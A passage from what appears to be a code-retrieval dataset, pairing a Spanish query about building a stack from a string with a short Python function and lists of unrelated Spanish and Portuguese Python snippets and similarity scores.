self.tablero[aux-i-1][aux2+i+1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,aux2+i+1],\"arriba-derecha\",1)\n\t\t\t\t\t\t\t\tkey[4]=True\n\t\t\t\tif color==2:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==1:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][aux2+i+1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,aux2+i+1],\"arriba-derecha\",2)\n\t\t\t\t\t\t\t\tkey[4]=True\n\n\t\t\t#arriba-izquierda\n\t\t\taux = fila-1\n\t\t\taux2 = columna-1\n\t\t\tif aux<5 and aux>0 and aux2<5 and aux2>0:\n\t\t\t\tpar = [aux,aux2]\n\t\t\t\tif color==1:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==2:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][aux2-i-1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,aux2-i-1],\"arriba-izquierda\",1)\n\t\t\t\t\t\t\t\tkey[5]=True\n\t\t\t\tif color==2:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==1:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][aux2-i-1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,aux2-i-1],\"arriba-izquierda\",2)\n\t\t\t\t\t\t\t\tkey[5]=True\n\t\t\t#abajo-derecha\n\t\t\taux = fila+1\n\t\t\taux2 = columna+1\n\t\t\tif aux<5 and aux>0 and aux2<5 and aux2>0:\n\t\t\t\tpar = [5-aux,5-aux2]\n\t\t\t\tif color==1:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==2:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][aux2+i+1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,aux2+i+1],\"abajo-derecha\",1)\n\t\t\t\t\t\t\t\tkey[6]=True\n\t\t\t\tif color==2:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==1:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][aux2+i+1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,aux2+i+1],\"abajo-derecha\",2)\n\t\t\t\t\t\t\t\tkey[6]=True\n\t\t\t#arriba-derecha\n\t\t\taux = fila+1\n\t\t\taux2 = columna-1\n\t\t\tif aux<5 and aux>0 and aux2<5 and aux2>0:\n\t\t\t\tpar = [5-aux,aux2]\n\t\t\t\tif color==1:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==2:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][aux2-i-1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,aux2-i-1],\"abajo-izquierd\",1)\n\t\t\t\t\t\t\t\tkey[7]=True\n\t\t\t\tif color==2:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==1:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][aux2-i-1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,aux2-i-1],\"abajo-izquierda\",2)\n\t\t\t\t\t\t\t\tkey[7]=True\n\t\t\t\n\t\t\tif True in key:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\telse:\n\t\t\treturn False", "def oracle(c):\n correct_arcs = get_arcs(c.sentence)\n if can_left_arc(c, correct_arcs):\n return Transition('la', c.sentence[c.stack[-1]].deprel)\n elif can_right_arc(c, correct_arcs):\n return Transition('ra', c.sentence[c.buffer[0]].deprel)\n else:\n return Transition('sh', '_')", "def prueba_clase():\n\n pos_ini = (0, 1, 0, 1, 0,\n 0, 0, 1, 1, 0,\n 0, 0, 0, 1, 1,\n 0, 0, 1, 1, 1,\n 0, 0, 0, 1, 1)\n\n pos_a0 = (1, 0, 0, 1, 0,\n 1, 0, 1, 1, 0,\n 0, 0, 0, 1, 1,\n 0, 0, 1, 1, 1,\n 0, 0, 0, 1, 1)\n\n pos_a4 = (1, 0, 0, 0, 1,\n 1, 0, 1, 1, 1,\n 0, 0, 0, 1, 1,\n 0, 0, 1, 1, 1,\n 0, 0, 0, 1, 1)\n\n pos_a24 = (1, 0, 0, 0, 1,\n 1, 0, 1, 1, 1,\n 0, 0, 0, 1, 1,\n 0, 0, 1, 1, 0,\n 0, 0, 0, 0, 0)\n\n pos_a15 = (1, 0, 0, 0, 1,\n 1, 0, 1, 1, 1,\n 1, 0, 0, 1, 1,\n 1, 1, 1, 1, 0,\n 1, 0, 0, 0, 0)\n\n pos_a12 = (1, 0, 0, 0, 1,\n 1, 0, 0, 1, 1,\n 1, 1, 1, 0, 1,\n 1, 1, 0, 1, 0,\n 1, 0, 0, 0, 0)\n\n\n entorno = Lights_out(pos_ini)\n\n assert entorno.acciones_legales(pos_ini) == range(25)\n assert entorno.sucesor(pos_ini, 0) == pos_a0\n assert entorno.sucesor(pos_a0, 4) == pos_a4\n assert entorno.sucesor(pos_a4, 24) == pos_a24\n assert entorno.sucesor(pos_a24, 15) == pos_a15\n assert entorno.sucesor(pos_a15, 12) == pos_a12\n print \"Paso la prueba de la clase\"", "def adelanta_camion(self, entorno, operacion, medio_de_origen_o_destino, camion, tipo):\r\n # TODO mejorar implementacion\r\n\r\n if tipo == \"Operacion\":\r\n\r\n operacion.recurso.cola.remove(camion)\r\n operacion.recurso.cola = \\\r\n operacion.recurso.cola[0:operacion.recurso.cola.index(self)] \\\r\n + [camion] + operacion.recurso.cola[operacion.recurso.cola.index(self):]\r\n\r\n print str(camion) + \" adelantado bajo criterio de \" + str(self) + \" \" + str(entorno.now)\r\n print \"\\tEn sistema: \" + str(operacion.recurso.cola) + \" Hora: \" + str(entorno.now)\r\n\r\n elif tipo == \"Almacen\":\r\n\r\n medio_de_origen_o_destino.cola.remove(camion)\r\n medio_de_origen_o_destino.cola = \\\r\n medio_de_origen_o_destino.cola[0:medio_de_origen_o_destino.cola.index(self)] \\\r\n + [camion] + medio_de_origen_o_destino.cola[medio_de_origen_o_destino.cola.index(self):]\r\n\r\n print str(camion) + \" adelantado bajo criterio de \" + str(self) + \" \" + str(entorno.now)\r\n print \"\\t\" + medio_de_origen_o_destino.nombre + \":\" \\\r\n + str(medio_de_origen_o_destino.cola) + \" Hora: \" + str(entorno.now)", "def __init__(self, altura, peso, edad):\n\t\tself.altura = altura # OJO TODAS LAS VARIABLES SON PUBLICAS \n\t\tself.peso = peso \n\t\tself.edad = edad\n\t\tself.profesion = \"\" # esta la inicializamos nosotros\n\t\tself.lista_tareas = []\n\t\tself.__privado = 1 # este atributo es privado no podemos acceder a el desde fuera", "def fim_da_rodada(self, recompensa, m, numero_de_cacadores):\n #print('Jogador 4 {}'.format(self.historico[-1]))\n pass", "def __init__(self):\n self.modelo = [\"A\", \"sucio\", \"sucio\",\"sucio\", \"sucio\",\"sucio\", \"sucio\"]", "def tecla(botao, player):\n botao_map = {'acelerador': [K_UP, K_w], 'freio': [K_DOWN, K_s],\\\n 'esquerda': [K_LEFT, K_a], 'direita': [K_RIGHT, K_d],\\\n 'atira': [K_RCTRL, K_LCTRL]}\n if player == 1:\n return botao_map[botao][0]\n return botao_map[botao][1]", "def aa(seq):\n global codontable\n seq = seq.upper()\n if codontable is None:\n # TODO: figure out the right place for the pre-computed information here\n bases = ['T', 'C', 'A', 'G']\n codons = [a+b+c for a in bases for b in bases for c in bases]\n codons = codons + list(map(lambda x: x.lower(), codons))\n amino_acids = 'FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'\n amino_acids = amino_acids + amino_acids.lower()\n codontable = dict(zip(codons, amino_acids))\n res = ''\n for i in range(0, len(seq) - 2, 3):\n res += codontable[seq[i:(i+3)]]\n return res", "def crear_tablero(tablero):\n for x in range(numero_filas):\n completar_tablero = [\"O\"] * numero_columnas\n tablero.append(completar_tablero) \n return tablero", "def crear_arbol():\n print (\"En este programa te brindamos 2 opciones para crear arboles, elige la que mas se adapte a tu objetivo\")\n \n try:\n crear=int(input(\"1. Crear un arbol de manera aleatoria\\n2. Introducir los datos en forma de arreglo\\n\"))\n except:\n print(\"Valor Invalido\")\n \n if crear==1:\n print(\"\\nExcelente! Tu arbol sera generado de forma aleatoria. Solo necesitamos aclarar que tipo de arbol quieres\")\n while True:\n try:\n altura=int(input(\"\\nAñade la altura de tu arbol: \"))\n except:\n print(\"El valor introducido no es valido!\")\n else:\n break\n \n perfecto=input(\"\\n¿Deseas crear un arbol perfecto? (si/no): \")\n if perfecto.lower()!=\"no\":\n perfecto=True\n else:\n perfecto=False\n \n arbol=tree(height=altura, is_perfect=perfecto)\n return arbol\n \n elif crear==2:\n print(\"\\nExcelente! Tu arbol sera generado en base a un arreglo. Solo necesitamos recibir los valores\")\n valores=[]\n counter=0\n print(\"\\nIntroduce los valores en orden. El valor inicial sera considerado la raiz. Los valores se ordenaran de izquiera a derecha.\" +\n \"Deja el valor en blanco para saltar ese espacio. Escribe -1 para dejar de añadir valores\")\n valor=\" \"\n while valor!=\"-1\":\n valor=input(f\"Introduzca el valor {counter}: \")\n if valor==\"\":\n valor=None\n valores.append(valor)\n counter+=1\n else:\n valores.append(int(valor))\n counter+=1\n valores.pop()\n root=build(valores)\n return root", "def limpiarVentana(self):\n\n self.productosAgregados=0\n self.lotesVentas={}\n self.facturaCobrada=False\n self.obraSocialSeleccionada=None\n self.formapago = None\n self.factura = None\n self.data = {}\n self.detallesTabla = {}\n self.lineObra.clear()\n self.lineObra.setEnabled(True)\n self.lineCuit.clear()\n self.lineCuit.setEnabled(True)\n self.tableObra.setVisible(False)\n self.rbtnObra.setChecked(False)\n self.limpiarTabla(self.tableProductos)\n self.limpiarTabla(self.tableFactura)\n self.cargarProductosSinObra()", "def arredonda(elemento):\n chave, mm = elemento\n return (chave,round(mm,1))", "def get_add_on():\n #List of all the add ons made with a list comprehension\n add_on_list = [[a, b] for a in list(string.ascii_lowercase) for b in list(string.ascii_lowercase)]\n global a_base\n #reset the a_base if it gets to high\n if a_base + a_key > len(add_on_list) - 1:\n a_base = -1\n #sets value of add_on\n add_on = add_on_list[a_base + a_key]\n add_on = \"\".join(add_on)\n a_base += a_key\n return add_on", "def cria_carro_fiat(self):\n\n self.total_de_carros_fiat += 1\n print(\"Carro Fiat #\", self.total_de_carros_fiat, \" criado\")", "def CreadorComentario(hora, fecha, contenido, act, usuario): \n nuevoComentario = Comentario(horacomentario=hora, fechacomentario=fecha, contenido=contenido, idactcomentario=act,loginusuario=usuario)\n nuevoComentario.save()\n Accion.objects.crearAccion(\n usuario,\n \"El usuario %s hizo un comentario en la actividad %s\" % (usuario.username, act.nombreact),\n 'i')\n\n Accion.objects.crearAccion(\n usuario,\n \"Se creo una instancia de Comentario con los valores Fecha: %s, Contenido: %s\" % (fecha, contenido),\n 'd'\n )", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def addCadastro(self, id_conteudo, cpf=None, rg=None, data_nascimento=None, nome=None,\n endereco=None, complemento=None, bairro=None, cep=None, email=None,\n profissao=None, faculdade=None, curso=None, facebook=None, twitter=None, fone1=None, fone2=None,\n fone3=None, anexo=None, frase=None, \n opt_parceiro=None, opt_opovo=None):\n try:\n conteudo = self._getConteudoPublicado(id_conteudo=id_conteudo)\n for i in conteudo['campos']:\n if (i['nome'] != 'complemento' and i['nome'] != 'fone2' and i['nome'] != 'fone3' and i['nome'] != 'opt_parceiro' and i['nome'] != 'opt_opovo' and i['nome'] != 'facebook' and i['nome'] != 'twitter'):\n if not eval(i['nome']):\n #algum campo não for preenchido\n return 3\n \n if(conteudo['cadastro_unico']):\n count_cpf = self.execSql(\"select_cpf_cadastros\",\n id_conteudo=int(id_conteudo),\n cpf=cpf).next()['count']\n if(count_cpf):\n #cpf já cadastrado\n return 2\n id_cadastro = self.execSql(\"select_nextval_cadastro\").next()[\"id\"]\n\n sequencial = self.execSql(\"select_maxval_sequencial_conteudo_cadastros\",\n id_conteudo=int(id_conteudo)).next()['max']\n if(sequencial):\n sequencial = int(sequencial)+1\n else:\n sequencial = 1\n self.execSqlu(\"insert_cadastro\",\n id_cadastro=int(id_cadastro),\n id_conteudo=int(id_conteudo),\n sequencial=int(sequencial),\n cpf=cpf,\n rg=rg,\n data_nascimento=data_nascimento,\n nome=nome,\n endereco=endereco,\n complemento=complemento,\n bairro=bairro,\n cep=cep,\n email=email,\n profissao=profissao,\n faculdade=faculdade,\n curso=curso,\n facebook=facebook,\n twitter=twitter,\n fone1=fone1,\n fone2=fone2,\n fone3=fone3,\n anexo=anexo,\n frase=frase,\n opt_parceiro=opt_parceiro,\n opt_opovo=opt_opovo)\n return 0\n except:\n #erro tente novamente\n return 1", "def posicioAlParking(matricula):\n if(_formatMatriculaValid(matricula)):\n con = lite.connect('parking.db')\n cur = con.cursor()\n try:\n cur.execute(\"SELECT placa FROM parking WHERE id_cotxe=?;\",(matricula,))\n row = cur.fetchone()\n if row:\n print \"El cotxe amb matricula\",matricula,\" es troba a la plaça\", row[0]\n else:\n print \"El coche amb matricula\",matricula,\"no es troba al parking\"\n\n except:\n pass\n con.close()\n else:\n print(\"Format matricula invalid per buscar la seva posicio.\")", "def adivinha(estado):\n letra = raw_input('Escolha uma letra: ')\n # verifica letra - ciclo\n while letra in estado['usadas']:\n print\n print '*** Letra já usada. Escolha outra sff!***'\n print\n letra = raw_input('Escolha uma letra: ')\n return letra" ]
[ "0.6110482", "0.58829135", "0.58471066", "0.5808168", "0.5769837", "0.5732787", "0.571716", "0.56439555", "0.5630807", "0.5551206", "0.55446774", "0.55200577", "0.5448135", "0.5437733", "0.5413697", "0.539102", "0.5377001", "0.5376293", "0.53636044", "0.53557664", "0.53530836", "0.5314257", "0.530811", "0.53033286", "0.52935094", "0.52654743", "0.526159", "0.52381605", "0.523792", "0.5222164", "0.52144593", "0.5214231", "0.52088976", "0.52026623", "0.5195885", "0.51841223", "0.518329", "0.51818466", "0.51686764", "0.51676464", "0.51492316", "0.5146041", "0.51458824", "0.51194465", "0.5116166", "0.5109906", "0.51081556", "0.51078004", "0.51053864", "0.50908583", "0.5086292", "0.5078589", "0.50719184", "0.5060955", "0.50602454", "0.5050151", "0.50495875", "0.50387657", "0.5025809", "0.50101453", "0.5008386", "0.5005887", "0.5003441", "0.4992609", "0.49904948", "0.49902463", "0.4960732", "0.4950297", "0.49445114", "0.49423566", "0.4941613", "0.49373937", "0.49337748", "0.49284247", "0.4917653", "0.4916684", "0.49123418", "0.4910442", "0.4907065", "0.49039826", "0.49037698", "0.4900909", "0.48996365", "0.48976508", "0.48954594", "0.48942074", "0.4883983", "0.48839816", "0.4879238", "0.4878766", "0.48784485", "0.48758483", "0.48753214", "0.4871771", "0.48624742", "0.48588637", "0.48553258", "0.48529825", "0.4851269", "0.48504436", "0.48495147" ]
0.0
-1
Devuelve pila del string ingresado
def stringToPila(palabra): pila = Pila() for elemento in palabra: apilar(pila, elemento) return pila
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_string2(self):\n pass", "def getApellidos(apellido):\n texto = f'El apellido es: {apellido}'\n return texto\n pass", "def psea(pname): # -> str:\n ...", "def print_as_text(pi):\n\n pi_string = str(\"%1.18f\" % pi)\n\n print(\"Definitive: \" + PI_STRING)\n\n print(\"Estimated: \", end=\"\")\n\n for i in range(0, len(pi_string)):\n\n if pi_string[i] == PI_STRING[i]:\n\n print(GREEN + pi_string[i] + RESET, end=\"\")\n\n else:\n\n print(RED + pi_string[i] + RESET, end=\"\")\n\n print(\"\\n\")", "def EnglishToPig(str):\r\n\r\n # TODO: Your code here\r\n\r\n\r\n # Change the return to return the converted string\r\n return(\"\")", "def __str__(self):\n return \"p(\" + \",\".join([str(round(c, digits)) for c in self.components]) + \")\"", "def input_cislo_policka():\n str_policka = input('\\nNa ktore policko chces umiestnit svoje \\'X\\'? Zadaj hodnotu 0 - 19: ')\n return str_policka", "def __repr__(self):\n s = ''\n no = self.getRaiz()\n s += str(no.getPai()) + '\\n'\n s += '^' + '\\n'\n s += str(no.getEsquerdo()) + ' <- '\n s += str(no.getDado()) + ' -> '\n s += str(no.getDireito())\n return s", "def text(self) -> str:", "def __unicode__(self):\n d = ((2, \".\"), (6, \".\"), (10, \"/\"), (15, \"-\"))\n s = list(map(str, self.cnpj))\n \n for i, v in d:\n s.insert(i, v)\n \n r = ''.join(s)\n \n return r", "def __str__(self):\n\t\tif self.__valide:\n\t\t\treturn str(self.__tete)\n\t\telse:\n\t\t\treturn \"(polynome invalide)\"", "def stringReco(obj):\n name = obj.get_name()\n name = obj._pid if (name is None) else name\n return (\"pdg: \" + name + \" E: \" + str(obj._E)\n + \" px: \" + str(obj._px) + \" py: \" + str(obj._py)\n + \" pz: \"+ str(obj._pz) + \" mass: \" + str(obj._m))", "def refang(self, text: str):", "def get_pi_as_string():\n\n request = requests.get(\"http://www.eveandersson.com/pi/digits/10000\")\n doc = BeautifulSoup(request.text, \"html.parser\").select_one(\"pre\").text.strip()\n pi_string = doc.replace(\" \", \"\").replace(\".\", \"\").replace(\"\\n\", \"\")\n return pi_string", "def __str__(self) -> str:\r\n return self.process(self.string)", "def value(self, p_str, p_str_1=None): # real signature unknown; restored from __doc__ with multiple overloads\n return \"\"", "def us(self, string=''):\n return string.replace(' ', '_')", "def to_pinyin(s: str) -> str:\n if s == '山西':\n return 'Shan1xi'\n elif s == '陕西':\n return 'Shan3xi'\n pylist = lazy_pinyin(s)\n py = ''.join(pylist)\n return py", "def get_orion_space_string(self) -> str:", "def saluda2(sujeto):\n print 'Hola %s !!' % sujeto", "def gerarPalavraSecreta():\n global palavraOculta\n for _ in range(len(palavraDoJogo)):\n palavraOculta += '*'\n print(palavraOculta)", "def __str__(self):\n allowed = ['!', '@', '#', '$', '%', '^', '&', '*', '/', '.', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n returnstring = \"\"\n for row in self.positions:\n for char in row:\n if char.isupper() or char == 'r' or char in allowed:\n returnstring += \"| \" + char + \" \"\n else:\n returnstring += \"| \" + \"_\" + \" \"\n returnstring += \"\\n\"\n return returnstring", "def label(mi_, ma_):\n\treturn \"caractères Unicode des points de code {} à {}\".format(mi_, ma_)", "def make_spondaic(self, scansion: str) -> str:\n mark_list = string_utils.mark_list(scansion)\n vals = list(scansion.replace(\" \", \"\"))\n new_vals = self.SPONDAIC_PENTAMETER[:-1] + vals[-1]\n corrected = \"\".join(new_vals)\n new_line = list(\" \" * len(scansion))\n for idx, car in enumerate(corrected):\n new_line[mark_list[idx]] = car\n return \"\".join(new_line)", "def __str__(self):\n turnstile = \"⊢\" if settings.unicode else \"|-\"\n if self.hyps:\n str_hyps = \", \".join(str(hyp) for hyp in self.hyps)\n return str_hyps + ' ' + turnstile + ' ' + str(self.prop)\n else:\n return turnstile + ' ' + str(self.prop)", "def __str__(self):\n value = str(self.puzzle) + str(\" \") + str(self.g) + str(\" \") + str(self.h)\n return value", "def GenerateString(self, i, string):\r\n \r\n if i <= 0:\r\n return string\r\n\t\t\r\n string = string.replace(\"F\", (self.f).lower()) \r\n string = string.replace(\"X\", (self.x).lower())\r\n string = string.replace(\"Y\", (self.y).lower())\r\n \r\n \r\n string = string.upper()\r\n string = self.GenerateString(i - 1, string)\r\n\r\n return string", "def strand_string(self):\n if self.is_forward():\n return '+'\n if self.is_reverse():\n return '-'\n return '.'", "def __str__(self):\n return '{} {}'.format(self.nombre, self.apellido)", "def cliquer_sur_unité(self):", "def metaphlan_krona_string(input):\n s = []\n for f in input:\n name = bn(f).replace(\"_pe.krona\", \"\").replace(\"_se.krona\", \"\")\n s.append(f\"{f},{name}\")\n return \" \".join(s)", "def string(self):\n return f'y = {self.a.item()}'", "def __str__(self):\n bold = \"*\" if self.bold else ''\n italic = \"/\" if self.italic else ''\n underline = \"_\" if self.underline else ''\n return bold + italic + underline + self.character", "def getNombre(nombre):\n texto = f'El usuario es: {nombre}'\n return texto\n pass", "def toString():", "def string(self):\n text = \"\"\n for char, qty in self.chars.items():\n text += char * qty\n return \"\".join(sorted(text))", "def string(self,pos_0,pos_1,n):\r\n n=int(n)\r\n if pos_0 <10:\r\n pos_0=\"00\"+str(pos_0)\r\n elif pos_0<100:\r\n pos_0=\"0\"+str(pos_0)\r\n\r\n if n <10:\r\n n=\"0\"+str((n))\r\n \r\n\r\n\r\n if pos_1 <10:\r\n pos_1=\"00\"+str(pos_1)\r\n elif pos_1<100:\r\n pos_1=\"0\"+str(pos_1)\r\n\r\n\r\n\r\n\r\n #pos\r\n c=\"\"\r\n\r\n c=str(pos_0)+str(pos_1)+str(n)\r\n #print(\"c\",c)\r\n return c", "def __str__(self):\n s = \"\"\n for i in range(13,25):\n if (self.p1vec[i] > 0):\n s += \"|W{0:02}|\".format(self.p1vec[i])\n elif (self.p2vec[25 - i] > 0):\n s += \"|B{0:02}|\".format(self.p2vec[25 - i])\n else:\n s += \"| |\"\n s += '\\n'\n for i in range(12, 0,-1):\n if (self.p1vec[i] > 0):\n s += \"|W{0:02}|\".format(self.p1vec[i])\n elif (self.p2vec[25 - i] > 0):\n s += \"|B{0:02}|\".format(self.p2vec[25 - i])\n else:\n s += \"| |\"\n return s", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def filtra(rut):\n caracteres = \"1234567890k\"\n rutx = \"\"\n for cambio in rut.lower():\n if cambio in caracteres:\n rutx += cambio\n return rutx", "def __unicode__(self):\n\n d = ((3, \".\"), (7, \".\"), (11, \"-\"))\n s = list(map(str, self.cpf))\n\n for i, v in d:\n s.insert(i, v)\n\n r = ''.join(s)\n\n return r", "def Problem11():\n return 'Ductile Coulomb-Mohr'", "def exemple():\r\n\r\n case_1 = \"\\u25CC\"\r\n case_1 = u\"{}\".format(case_1)\r\n fourmi_1_1 = \"\\u22C0\"\r\n fourmi_1_1 = u\"{}\".format(fourmi_1_1)\r\n fourmi_2_1 = \"\\u21CA\"\r\n fourmi_2_1 = u\"{}\".format(fourmi_2_1)\r\n fourmi_3_1 = \"\\u25BC\"\r\n fourmi_3_1 = u\"{}\".format(fourmi_3_1)\r\n fourmi_1_2 = \"\\u22C0\"\r\n fourmi_1_2 = u\"{}\".format(fourmi_1_2)\r\n fourmi_2_2 = \"\\u21C8\"\r\n fourmi_2_2 = u\"{}\".format(fourmi_2_2)\r\n fourmi_3_2 = \"\\u25B2\"\r\n fourmi_3_2 = u\"{}\".format(fourmi_3_2)\r\n clods_1 = \"\\u2726\"\r\n clods_1 = u\"{}\".format(clods_1)\r\n clods_2 = \"\\u2737\"\r\n clods_2 = u\"{}\".format(clods_2)\r\n clods_3 = \"\\u2739\"\r\n clods_3 = u\"{}\".format(clods_3)\r\n \r\n print(term.move_xy(82,3) + term.white + 'DEPOT : ' + (case_1))\r\n print(term.move_xy(82,5) + term.white + 'Clods de niveau 1 : ' + (clods_1))\r\n print(term.move_xy(82,6) + term.white + 'Clods de niveau 2 : ' + (clods_2))\r\n print(term.move_xy(82,7) + term.white + 'Clods de niveau 3 : ' + (clods_3))\r\n print(term.move_xy(82,8) + term.white + 'Fourmis de niveau 1 : ' + (fourmi_1_1) + ' ' + (fourmi_1_2))\r\n print(term.move_xy(82,9) + term.white + 'Fourmis de niveau 2 : ' + (fourmi_2_1) + ' ' + (fourmi_2_2))\r\n print(term.move_xy(82,10) + term.white + 'Fourmis de niveau 3 : ' + (fourmi_3_1) + ' ' + (fourmi_3_2))\r\n print(term.move_xy(82,12) + term.white + 'Joueur 1 vous jouez en rouge.')\r\n print(term.move_xy(82,13) + term.white + 'Joueur 2 vous jouez en jaune.')", "def format(self) -> str:", "def drawString(text: str):\n pass", "def PigToEnglish(str):\r\n\r\n # TODO: Your code here\r\n\r\n\r\n # Change the return to return the converted string\r\n return(\"\")", "def __str__(self):\n inside_list = lambda _v, _h, a: any(x == _h and y == _v for y, x in a)\n resultant = ''\n for _v in range(1, self.size_v + 1):\n for _h in range(1, self.size_h + 1):\n if self.current_location[1] == _h and self.current_location[0] == _v:\n resultant = resultant + '@'\n elif inside_list(_v, _h, self.boxes):\n resultant = resultant + '$'\n elif inside_list(_v, _h, self.storage_locations):\n resultant = resultant + '.'\n elif inside_list(_v, _h, self.wall_squares):\n resultant = resultant + '#'\n else:\n resultant = resultant + ' '\n resultant = resultant + '\\n'\n\n return resultant", "def string_value ( self, font ):\n return self.factory.str_font( font )", "def string_value ( self, font ):\n return self.factory.str_font( font )", "def string_value ( self, font ):\n return self.factory.str_font( font )", "def string_value ( self, font ):\n return self.factory.str_font( font )", "def one_pass(self, s: str) -> str:\n alpha_map = {\n '1': 'a', '2': 'b', '3': 'c', '4': 'd', '5': 'e', '6': 'f', '7': 'g',\n '8': 'h', '9': 'i', '10': 'j', '11': 'k', '12': 'l', '13': 'm', '14': 'n',\n '15': 'o', '16': 'p', '17': 'q', '18': 'r', '19': 's', '20': 't',\n '21': 'u',\n '22': 'v', '23': 'w', '24': 'x', '25': 'y', '26': 'z'\n }\n\n i, res = 0, ''\n while i < len(s):\n if i + 2 < len(s) and s[i + 2] == '#':\n res += alpha_map[s[i:i + 2]]\n i += 3\n else:\n res += alpha_map[s[i]]\n i += 1\n return res", "def _trans_string(self, n):\r\n return \"%s %d\" % (self.desc, n+1)", "def _pinyin(self, rest):\n # Fix if sentence contains some english '.tr yacin太牛了'\n rest = filter(lambda x: not self.isascii(x), rest.decode('utf8'))\n def reduce_reading((char, readings)):\n \"\"\"If a character has multiple cjklib readings, use the fine-tuning\n dict from pinyin toolkit and CEDICT as a backup.\"\"\"\n if len(readings) == 1:\n return readings[0]\n else:\n try:\n return self.pinyin_toolkit_lookup[char]\n except KeyError:\n return self._dict_reading_lookup(char)\n\n readings = [self.char_lookup.getReadingForCharacter(x, 'Pinyin') for x in rest]\n res = u' '.join(map(reduce_reading, zip(rest, readings)))\n return res.encode('utf8')", "def get_string(self, **kwargs):\n ...", "def getText():", "def getText():", "def getText():", "def getText():", "def getText():", "def autoid(self) -> str:", "def autoid(self) -> str:", "def __str__(self):\n result = ''\n result += '+---+\\n'\n for i in range(3):\n result += '|' + self[i*3] + self[i*3+1] + self[i*3+2] + '|\\n'\n result += '+---+'\n return result", "def str_value(self, data):\n return str(180*SimpleField.value(self, data)/pi)", "def lowerPen(gcode):\r\n gcode.append(\"M300 S43\")\r\n #gcode.append(\"G0 Z0\")\r", "def _str_make(self):\n return self._name if self._fact is None else f\"{self._fact} × {self._name}\"", "def pos_to_name(reg):\n l,b = position_region(reg).galactic() \n if numpy.sign(b) == 1:\n pm = \"+\"\n else:\n pm = \"-\"\n text = \"G%4.2f%1s%4.2f\" % (l,pm,abs(b))\n return text", "def llegir_placa(p):\n\t# Obrim el fitxer\n\ts = \"\"\n\tf=open('places.dat','r+')\n\t# Calculem la posicio que volem mirar\n\tposicio = p*7\n\tf.seek(posicio)\n\ts+=f.read(7)\n\tf.close()\n\treturn s", "def __init__(self, string, spongeness=6):\n self.original = string\n self.spongeness = spongeness\n self.sponge_percentage = int(spongeness) * 10\n self.text = self.__spongefy()", "def _get_string_cfdi(text, size=100):\n if not text:\n return None\n text = text.replace('|', ' ').replace('/', '').replace('-', '').replace('_', '')\n return text.strip()[:size]", "def __str__(self):\n return \"s(\" + str(self.p1) + \",\" + str(self.p2) + \")\"", "def rep_Ir(glosstext, repchar=\"…\"):\n oplat = \"[GLat]\"\n clat = \"[/GLat]\"\n latlist = []\n if glosstext.find(oplat) != 0:\n latlist.append(\"\")\n glosstext = glosstext[glosstext.find(oplat):]\n while oplat in glosstext:\n lat = glosstext[:glosstext.find(clat) + 7]\n latlist.append(lat)\n glosstext = glosstext[glosstext.find(clat) + 7:]\n if oplat in glosstext:\n glosstext = glosstext[glosstext.find(oplat):]\n else:\n if glosstext:\n latlist.append(\"\")\n repchar = \" \" + repchar + \" \"\n latintext = repchar.join(latlist)\n latintext = latintext.strip()\n return latintext", "def nom_complet(self):\n return \"{:25} (probabilité={}, {})\".format(\n self.nom, self.probabilite_sur, self.msg_points)", "def __str__(self):\n out = \"{}.\".format(self.move_number)\n if self.white.san != \"\":\n out += \" \" + str(self.white)\n else:\n out += \"..\"\n if self.black.san != \"\":\n out += \" \" + str(self.black)\n if self.comment:\n out += \" {\" + self.comment + \"}\"\n return out", "def get_str ( self, fillchar='-', 